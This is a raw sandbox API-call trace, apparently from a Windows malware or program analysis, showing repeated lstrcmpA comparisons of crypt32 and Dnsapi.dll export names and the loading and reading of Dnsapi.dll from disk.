lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0091.067] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0091.067] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0091.067] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0091.068] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0091.069] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0091.070] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0091.265] GetProcessHeap () returned 0x440000 [0091.265] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x403c040 | out: hHeap=0x440000) returned 1 [0091.275] GetProcessHeap () returned 0x440000 [0091.275] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459220 [0091.276] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0091.289] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0091.289] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0091.289] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0091.289] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.289] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0091.290] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0091.290] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0091.290] GetProcessHeap () returned 0x440000 [0091.290] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xa7b88) returned 0x39ad010 [0091.292] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0091.292] ReadFile (in: hFile=0x17c, lpBuffer=0x39ad010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x39ad010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0091.523] CloseHandle (hObject=0x17c) returned 1 [0091.523] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0091.523] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.523] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0091.523] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.523] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.523] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0091.523] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.523] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.523] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0091.523] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0091.524] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.524] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.524] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0091.524] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0091.524] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0091.524] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.524] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.524] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0091.524] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0091.524] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.524] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0091.524] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.524] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.524] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0091.524] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0091.524] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.524] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0091.524] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0091.524] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.524] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.524] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0091.524] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0091.524] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.525] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0091.525] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0091.525] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0091.525] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0091.526] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.526] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0091.526] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0091.526] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0091.526] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.526] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.526] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0091.526] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0091.527] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0091.527] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0091.528] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.529] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.530] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0091.530] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0091.530] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0091.530] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0091.530] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0091.530] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0091.530] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 